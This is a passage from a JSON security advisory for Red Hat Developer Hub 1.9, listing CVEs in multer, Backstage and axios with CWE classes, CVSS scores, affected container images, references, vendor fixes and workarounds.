"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-2359"
},
{
"category": "external",
"summary": "RHBZ#2443350",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443350"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-2359",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2359"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2359",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2359"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab",
"url": "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc"
}
],
"release_date": "2026-02-27T15:42:08.088000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via dropped file upload connections"
},
{
"cve": "CVE-2026-3304",
"cwe": {
"id": "CWE-459",
"name": "Incomplete Cleanup"
},
"discovery_date": "2026-02-27T16:01:39.674165+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443353"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Multer, a Node.js middleware. A remote attacker could exploit this vulnerability by sending specially crafted malformed requests. This could lead to resource exhaustion, resulting in a Denial of Service (DoS) for the application using Multer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via malformed requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3304"
},
{
"category": "external",
"summary": "RHBZ#2443353",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443353"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3304"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3304",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3304"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee",
"url": "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p"
}
],
"release_date": "2026-02-27T15:44:37.187000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via malformed requests"
},
{
"cve": "CVE-2026-3520",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-04T17:01:43.432970+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444584"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can send specially crafted malformed requests which may induce a stack overflow. This can lead to a Denial of Service (DoS) making the service unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via malformed requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3520"
},
{
"category": "external",
"summary": "RHBZ#2444584",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444584"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3520",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3520"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3520",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3520"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752",
"url": "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2"
}
],
"release_date": "2026-03-04T16:17:18.962000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via malformed requests"
},
{
"cve": "CVE-2026-24046",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"discovery_date": "2026-01-21T23:00:53.856026+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431878"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Backstage. A symlink-based path traversal issue can be exploited in multiple Scaffolder actions and archive extraction utilities during template execution via malicious symlinks. An attacker with access to create and execute Scaffolder templates can read sensitive files, delete arbitrary files or write files outside the intended workspace, resulting in unauthorized information disclosure or system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "backstage/backend-defaults: backstage/plugin-scaffolder-backend: backstage/plugin-scaffolder-node: possible symlink path traversal in scaffolder actions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to have access to create and execute Scaffolder actions, specifically the debug:log, fs:delete actions and archive extractions, limiting the exposure of this flaw. Additionally, file systems operations are constrained by the permissions of the process, limiting the impact to files that can be accessed by Backstage. Due to these reasons, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24046"
},
{
"category": "external",
"summary": "RHBZ#2431878",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431878"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24046",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24046"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d",
"url": "https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp"
}
],
"release_date": "2026-01-21T22:36:30.794000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "To mitigate this issue, consider implementing strict access controls for Backstage Scaffolder templates. Restrict the ability to create and execute Scaffolder templates to trusted users only, utilizing the Backstage permissions framework. Additionally, audit existing templates for any symlink usage and consider running Backstage within a containerized environment with a highly restricted filesystem to limit potential impact.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "backstage/backend-defaults: backstage/plugin-scaffolder-backend: backstage/plugin-scaffolder-node: possible symlink path traversal in scaffolder actions"
},
{
"cve": "CVE-2026-25153",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-01-30T22:00:57.084320+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2435576"
}
],
"notes": [
{
"category": "description",
"text": "A code injection flaw has been discovered in the npm @backstage/plugin-techdocs-node library. When TechDocs is configured with `runIn: local`, a malicious actor who can submit or modify a repository\u0027s `mkdocs.yml` file can execute arbitrary Python code on the TechDocs build server via MkDocs hooks configuration.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@backstage/plugin-techdocs-node: @backstage/plugin-techdocs-node vulnerable to arbitrary code execution via MkDocs hooks",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25153"
},
{
"category": "external",
"summary": "RHBZ#2435576",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435576"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25153",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25153"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25153",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25153"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf"
}
],
"release_date": "2026-01-30T21:31:58.870000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@backstage/plugin-techdocs-node: @backstage/plugin-techdocs-node vulnerable to arbitrary code execution via MkDocs hooks"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25679",
"cwe": {
"id": "CWE-1286",
